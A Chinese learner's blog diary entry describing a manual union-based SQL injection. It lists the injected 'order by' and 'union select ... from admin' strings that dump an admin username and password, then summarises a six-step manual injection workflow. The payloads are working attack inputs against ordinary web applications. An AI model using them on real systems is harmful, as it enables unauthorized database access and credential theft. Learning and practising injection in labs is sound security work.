菜鸟日记之手动破解用户名和密码

十一月八日   晴朗。

先放一个名词:联合查询

https://www.2cto.com/database/201803/733883.html

https://www.cnblogs.com/caofangsheng/p/5118173.html

这两篇博客都解释的挺清楚的。感觉一定要自己动手做一遍才能记住,现在只是理解,还不够。----

下面记一次神奇的SQL注入破解:

step1:

在链接后加上  order by 11   ------------------->页面显示正常

改成  order by 12 ---------------------->页面报错

===========》说明此站字段长度为11

二、爆管理员用户名及密码

step 1:

在链接后面加上   union select 1,2,3,4,5,6,7,8,9,10,11 from admin

页面显示数字 2 ,3     =========》说明可以爆出管理员的用户名和密码

step2:

链接后改成union select  1,admin,password,4,5,6,7,8,9,10,11 from admin

       于是,可以看到用户名admin和密码bfpms

       虽然爆出来了,但我还是很好奇为啥能爆出来=。=

       ★  手工联合查询注入技术

      https://baijiahao.baidu.com/s?id=1605549994392043314&wfr=spider&for=pc

      https://www.cnblogs.com/GHost-Ma/p/5502896.html

        这两个博客讲的都不错,从写工具的角度去考量整个SQL注入也是个新的学习角度。是该补补python基础了T-T。

       总结一下这些博客总的的手工注入的流程:

       step1:

                    判断是数字型还是字符型注入

      step2:

                   判断查询列数

      step3:

                  判断显示位

     step4:

                 获取数据库所有表名

    step5:

               获取数据库、表中字段名

   step6:

              获取字段数据

猜你喜欢

转载自blog.csdn.net/njc_sec/article/details/83891723